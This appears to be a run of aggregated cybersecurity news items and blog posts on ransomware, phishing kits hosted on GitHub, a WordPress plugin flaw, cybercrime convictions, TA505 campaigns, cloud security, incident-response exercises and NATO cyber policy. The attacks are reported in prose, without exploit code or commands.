Recently another major European company was hit by ransomware, the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals are abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical $ domain. Attackers are using stolen brand graphics to make their pages resemble the brand they were abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical  $ domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the canonical domain that resembles the brand they are abusing.”

The inspection of the lookalike GitHub account used by crooks revealed
the files in the phishing kit are viewable as follows, experts noticed that the HTML code is lightly encoded in order to obfuscate the content.

phishing Github sites

The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the platform does not provide PHP back-end services.

Experts observed that cybercriminals in some cases used the domain as a traffic redirector with the intent to ensure that the actual phishing page remains live for a bit longer.

The drawback in using public GitHub accounts it that security researchers have major visibility into the threat actors’ activity and on the changes to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub that took down the accounts hosting phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular ùWordPress plugin with more than 900,000 downloads, it allows to add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

Maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE), both issues were tracked as CVE-2019-9978.

The issue in the WordPress plugin has been fixed with the release of the 3.5.3 version of the plugin. In the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposed, such as mining cryptocurrency or deliver malware.

The availability of the exploit code allowed attackers attempting to exploit the vulnerability, but hackers were only able to inject JavaScript code to redirect users to malicious sites.

Experts at Palo Alto Network discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by PaloAlto Network Unit42 researchers. “Figure 5 shows a POST request from one of the samples: “

Social Warfare zero-day PoC

The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance sites, and news, experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes PaloAlto Network. “Website administrators should to update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)

The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing the banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware
between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.
The court decided to relax the expert bail terms, allowing him to access the Internet and continues his ordinary working activities. The only restriction on Hutchins is that the expert cannot visit the Wannacry server domain.

The decision is unusual because computer crime suspects are not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he was obliged to surrender his passport and he must wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins would face with a maximum penalty of five years in prison a $250,000 fine and a year of probation.

According to the Federal law enforcement, the researchers told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced to 90 months in prison by US DoJ authorities for operating an international cybercrime marketplace named Codeshop. was a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.

CodeShop carding

Ametovski (known online as Codeshop, Sindromx, xhevo, and Sindrom) was arrested by Slovenian authorities in January 2014, at the time he was charged with aggravated identity theft, access device fraud conspiracy, and wire fraud conspiracy. The Macedonian citizen was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft, he was also ordered to forfeit $250,000 and pay restitution that will be determined later.

Codeshop customers were able to buy stolen card data searching for specific types of data based on criteria such as country, bank, and bank identification number.

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs.” reads the press release the Justice Department.      

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own.  Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.      

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)

The post Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison appeared first on Security Affairs.

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russianbased company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including 
the Dridex banking trojantRAT RAT, FlawedAmmy RAT, 
Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macr. The macro downloads a payload from the command and control (C&C) server, the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.


The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.

A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.

Games people play: testing cybersecurity plans with table-top exercises

If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says: ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulators office?
  • Does the organisation have the email address or phone numbers for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things might go wrong (for customers, stakeholders, staff, and media (including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and knowing what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

IoT Vulnerabilities on the Rise
According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.

Cyber Security Roundup for January 2019

The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included: the first and last names of individuals caught or suspected of stealing goods from stores descriptions of the people involved, their vehicles and other incident-related information the product codes of the goods involved the value of the associated loss.

Hundreds of German politicians, including Chancellor Angela Merkel, have had personal details stolen and published online at the start of January.  A 20 year suspect was later arrested in connection to this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

Security company ForeScout said it had found thousands of vulnerable devices using search engines Shodan and Cenys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control over after it developed its own proof-of-concept malware.

Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password invoke by Reddit in response. A Reddit admin said "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access."

Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email attack made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


NATO’s Cyber Operations Center – Will Russia Feel Threatened?

According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023.  The new COC marks NATO’s understanding of the importance that cyberspace plays in conflict, particularly in times of political tensions that has resulted in cyber malfeasance that has targeted elections and critical infrastructure.  The establishment of the COC is a natural evolution in how to address cyber attacks in a more timely manner by integrating cyber actions with more conventional military capabilities.  In early 2014, after notable cyber incidents were a part of international incidents that occurred in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement under Article 5 of the treaty.

In those particular instances, Russia was suspected in orchestrating or at least tacitly supporting the cyber attacks that afflicted both states.  Since then, Russia’s alleged cyber activities have only become more brazen in their scale and aggressiveness.  From suspected involvement in launching cyber attacks against Ukrainian critical infrastructure to launching a variety of cyber operations to meddle in the elections of foreign governments, Russia has taken advantage of the uncertainty of cyberspace where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to a point of war.

NATO has always provided a strong military counterpoint to Russian influence in the European region and projecting a credible threat in cyberspace is an important complement to NATO capabilities.   However, previously, NATO didn’t have any of its own cyber weapons, a significant problem given Russia’s perceived position of a near-peer level adversary of the United States.  With the establishment of the cyber command, the United States, United Kingdom, and Estonia have offered the Alliance their cyber capabilities.  As described in one news article, the alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the COC and under the command of NATO’s top general. With this in hand, it will be interesting to see if this will serve as the deterrent it’s intended to be and how Russia may adjust their cyber activities, particularly against NATO member countries.

However, there is still the lingering problem the Alliance faces with regards to the rules of engagement.  Classifying cyber attacks under Article 5 is a start but doesn’t help provide a path forward to how NATO can and should engage and respond to cyber attacks.  While this provides NATO a certain flexibility in addressing cyber attacks allowing the Alliance to take each on a case-by-case basis in determining the extent of its response, it does not provide adversarial states an idea of tolerated and intolerable cyber activities.  This shortcoming serves only to provide states like Russia enough wiggle-room to continue their offensive cyber operations as long as they don’t cross an undefined threshold.  It’s long been hypothesized that attacks crippling critical infrastructures would meet that threshold, but as seen in Ukraine, this bar keeps being pushed a little farther each time.

The COC is a much-needed instrument in NATO’s overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate, retaliate against cyber attacks.  That said, the longer there are no clear lines of what will and will not be deemed acceptable in cyber space will keep the status quo pretty much in place.  Once fully operational, the first test of the COC will be how the it will respond and in what proportion to an attack against a member state.  And it’s at this time all eyes will turn to Russia to see how it will react and alter how and where it conducts its operations.

This is a guest post by Emilio Iasiello

The post NATO’s Cyber Operations Center – Will Russia Feel Threatened? appeared first on CyberDB.

State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime

There has been recent focus on alleged Iran cyber activity the past few weeks, spurned on by the publication of a vendor report on Iranian operations.  Per the vendor’s findings, not only was Iran likely behind the activity that was targeting government and private sector in the Middle East, it was implementing National Security Agency exploits that were stolen and dumped into the public domain by the Shadow Brokers group in April 2017.  As recently as late August 2018, Iran is suspected of trying to launch influence operations ahead of the midterm elections.  The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its tool box to conduct retaliatory attacks.

The new reporting comes at a time when Russia’s cyber malfeasance has largely dominated the press, due to its influence operations efforts and election shenanigans, not just in the United States but in other countries as well.  Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and the SWIFT banking transactions before that.  Iran was propelled onto the scene with Operation Ababil

DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi AramcoSome consider Iran a powerful cyber nation on par or close to it to China and Russia.  Others, maintain that Iranian actors are much less sophisticated, preferring to implement “tried-and true tactics while targeting many individuals.”  China initially led the state-led cyber espionage activity, which largely was curbed against the United States once the “no hack” pact was agreed to in 2015.

There seems to be a perpetual “revolving door” of news-cycle focus on suspected state activity, with new reports reporting on hostile espionage and exploitation occurring against global targets.  The purpose of these appears to track the latest and greatest escapades of these governments using – in most cases – publicly available tools and exploits that are publicly accessible (see Shadow Brokers above) and using vectors that for the most part are routine for any hostile cyber actor (certainly, if a state actor is “sophisticated”, the intimation is that the activity hasn’t been detected as of yet, or the sophisticated tools/exploits haven’t been implemented yet).

Between the ongoing stories of adversarial state activity as aforementioned above and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the “hostile state actor as monolith” narrative into the public eye.  Yet, like the saying goes, “if everything is important, nothing is important,” which rings with authenticity with regards to state cyber activity.  Actual activity or incidents that threaten to disrupt, destroy, degrade, deny, or manipulate data systems or the data resident on them deserve to be pushed to the forefront as they potentially impact everyone at all levels.

But theft of intellectual property and state secrets affect a minority, and rarely if ever will impact everyday citizens.  Such vigorous scrutiny and analysis of suspected state activity should apply to the cyber crime ecosystem whose nefarious endeavors directly impact the global population.  And while there are isolated incidents of law enforcement efforts arresting groups and individuals or taking down marketplaces, this has failed to put a dent into a global industry that was cited as the second most reported economic crime, according to a 2017 report by the same vendor.

This needs to change and it would be welcome to see such vendors with a wide and deep visibility into the cyber threat space to uncover some of the more “sophisticated” state actors, to apply that precision against a threat intent on exploiting everyone on the planet.  Some of the more notable breaches have exposed a high volume of individual data:

2013/14         Yahoo                                                 3 Billion Accounts

2016               Adult Friend Finder                          412 Million Accounts

2014               eBay                                                    145 Million Users

2017               Equifax                                               143 Million User

2008               Heartland Payment Systems            134 Million credit cards

One thing is clear – cyber criminals have proven to be as sophisticated and resourceful as state actors, often times using the same tools and techniques.  The fact that this category of cyber actor is not as robustly tracked, and information shared directly to the appropriate authorities is disappointing.


This is a guest post by Emilio Iasiello

The post State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime appeared first on CyberDB.

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .

  In other words:  from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs. 

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.

Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.

